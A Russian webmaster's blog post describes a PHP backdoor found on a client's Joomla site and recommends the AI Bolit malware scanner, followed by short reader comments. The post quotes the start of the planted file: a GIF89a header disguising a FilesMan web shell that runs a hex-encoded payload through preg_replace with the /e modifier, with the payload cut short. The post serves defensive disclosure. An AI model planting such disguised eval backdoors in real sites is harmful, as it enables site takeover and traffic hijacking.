Сегодня вычислил на хостинге клиента интересный руткит
|
1 2 3 4 5 6 7 8 |
GIF89af <? $color = «#df5»; $default_action = ‘FilesMan’; $default_use_ajax = true; $default_charset = ‘Windows-1251’; preg_replace(«/.*/e»,«\x65\x76\x61\…..тут ещё много символов ….T72vwA=’\x29\x29\x29\x3B»,«.»); ?> |
Залили используя дыры в Joomla (господа — нужно следить за обновлениями!) в неиспользуемый темплейт — далее, с его помощью, происходило заражение файлов с целью перенаправления поискового и мобильного трафика.
А вычислилась сия гадость с помощью контроля за изменением в файлах и анализа логов…
Пока гуглил на предмет данного руткита наткнулся на отличную утилитку для поиска на сайте всяческой нечисти, вроде моей — AI Bolit — скрипт с открытым кодом и хорошей репутацией, так что юзайте на здоровье.
Кстати, перед тем как вычистить заразу — натравил на сайт этот дивный скриптик — помимо того, что он вычислил заразу — предоставил ещё много интересной информации для усиления защиты сайта, так что рекомендую.
На страничке со скриптом есть ссылки на его обсуждение на известных SEO форумах — там тоже много интересного о защите сайтов.
9 комментариев на «“Ai-bolit — скрипт для поиска руткитов бэкдоров …”»
спасибо за инфу буду знать как и что.
Полезная штуковина, спасибо большое! Давно подыскивал что-то подобное!
Хороший скриптик, уже успел его опробовать на деле!
Понравился скрипт, работает очень хорошо! Спасибо!
Спасибо за скрипт, буду использовать его теперь!
Отличный скрипт. Нашёл много интересного на моём сайте. 🙁 Буду теперь разбираться.
Такой простой и классный скрипт, классно работает!
Как оказывается все просто, всего пару строчек кода. Все гениальное просто!
Здравствуйте.
Тоже обнаружил такой руткит, как в примере и удалил его, сменив все пароли. Достаточно ли этого?
И для чего он еще может быть использован?
Спасибо за ваши ответы.